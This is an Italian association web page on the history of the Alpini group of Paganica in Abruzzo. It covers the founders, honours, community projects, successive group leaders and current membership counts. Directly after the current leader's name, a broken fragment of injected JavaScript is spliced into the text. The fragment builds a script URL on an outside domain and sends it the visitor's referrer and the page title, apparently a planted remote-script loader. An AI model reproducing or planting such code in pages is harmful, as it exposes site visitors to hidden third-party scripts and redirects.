A.N.A. Sezione Abruzzi

GRUPPO ALPINI “M. ROSSI” – PAGANICA

giugno 1st, 2007  |  Published in I gruppi della Sezione Abruzzi

 

Il Gruppo Alpini di Paganica si costituì nel 1957, con proprio gagliardetto, ad opera di 2 Alpini della I° guerra mondiale (Francesco Rotellini e Domenico Di Pasquale) ai quali si affian­carono alcuni Alpini della II guerra mondiale: 

Leonida Rossi, Antonio Ciuca, Franco Cicino, Raniero Giusti, Daneo Nocella e Domenico De Paulis. 

Il Gruppo fu intitolato al serg. alpino Mario Rossi, Medaglia d’argento alla memoria (fronte Greco- Albanese). 

Altra onoreficenza sul fronte è le Croce di Guerra a Domenico De Paulis. 

Già dai primi anni, il Gruppo superò i 100 iscritti; attualmente ne conta circa 170 più 10 sostenitori amici. 

Nell’82 organizzò, a proprie spese, il 25° della fondazione, riscuotendo un grande plauso dai numerosissimi Alpini accorsi da tutta la Provincia. 

In tale occasione, la Signora Marcella Rossi Spodea scrisse 2 articoli, pubblicati sull’Alpino Nazionale. 

Il Gruppo è interessato ad escursioni sul Gran Sasso, a giornate ecologiche, e svolge una presenza attiva nella vita del paese (con la realizzazione di una fontana, e di una tv a “circuito chiuso” presso il reparto lungodegenti dell’ospedale S.Salvadore, prima dislocato, a Paganica). 

Attualmente il Gruppo è interessato alla ristrutturazione del rudere “Chiesetta del Salvadore” per la realizzazione della propria sede e di una “sala riunioni” per la comunità di Paganica. Il Gruppo, infine, ha partecipato, con propri Alpini, alla realizzazione del pronto soccorso di Romail e si è gemellato con il Gruppo di Tarzo (tv), instaurando un vero rapporto alpino. I suoi capigruppo sono stati, nell’ordine: 

Francesco Rotellini, Leonida Rossi, Corrado Palmerini, Corrado Masciovecchio, Corradino Moro, ancora in carica. 

 

Il Capo gruppo 

Corradino Moro

 

 


Le notizie relative ai Gruppi della Sezione Abruzzi sono tratte dalla seconda parte del libro intitolato “Alpini Verso L’aurora” di Mario SALVITTI, che narra la storia di 150 Gruppi Alpini abruzzesi. Tale libro é stato fortemente voluto dall’ex presidente sezionale Antonio Festa ed é stato realizzato in occasione della celebrazione del 70° anniversario della fondazione della Sezione Abruzzi (1929-1999).

Il libro va ad aggiungersi a quello di Antonio Procacci: “Abruzzo Terra Di Alpini”. Entrambi offrono al lettore testimonianze del glorioso passato degli Alpini abruzzesi.

 

Attualmente risultano iscritti al gruppo:
AGGREGATO 35
AIUTANTE 8
ALPINO 93
136

di cui iscritti alla Protezione Civile

AGGREGATO 15
AIUTANTE 8
ALPINO 13
36

 

L’attuale capogruppo è il Signor: D’Alfonso Pietros.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }}

Your Comments

L’Alpino d’Abruzzo